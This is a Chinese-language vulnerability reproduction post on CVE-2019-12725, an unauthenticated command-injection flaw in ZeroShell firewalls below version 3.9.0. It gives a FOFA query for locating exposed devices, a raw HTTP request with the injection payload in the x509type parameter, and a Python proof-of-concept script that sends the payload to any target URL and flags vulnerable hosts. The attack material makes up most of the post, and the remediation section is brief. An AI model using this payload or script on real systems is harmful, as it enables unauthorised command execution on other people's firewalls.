声明
本篇文章仅用于漏洞复现与技术研究,请勿利用文章内的相关技术从事非法测试,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
二、漏洞描述
ZeroShell防火墙版本小于3.9.0存在命令执行(CVE-2019-12725) , 攻击者可通过特定URL Payload对目标实施攻击,从而进行命令执行获取目标服务器敏感信息。
CVE编号:CVE-2019-12725
CNNVD编号:CNNVD-201907-1141
三、影响版本
- ZoreShell防火墙版本小于3.9.0
四、漏洞复现
FOFA:app="Zeroshell-防火墙"
漏洞链接:https://127.0.0.1/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27
本地环境复现
漏洞数据包
GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Connection: close
漏洞POC
#!usr/bin/env python
# *-* coding:utf-8 *-*
import requests
import sys
def run(arg):
try:
payload = "cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27"
url = arg+payload
r = requests.get(url,timeout=15,verify=False)
if 'uid=' in r.text and 'gid=' in r.text and "groups=" in r.text:
print('\033[1;31;40m')
print(url+"存在zeroshell防火墙存在远程命令执行漏洞")
print('\033[0m')
else:
print(arg+"不存在漏洞")
except:
print(arg+"不存在漏洞")
if __name__ == '__main__':
url=sys.argv[1]
run(url)
五、修复方案
目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法 https://zeroshell.org/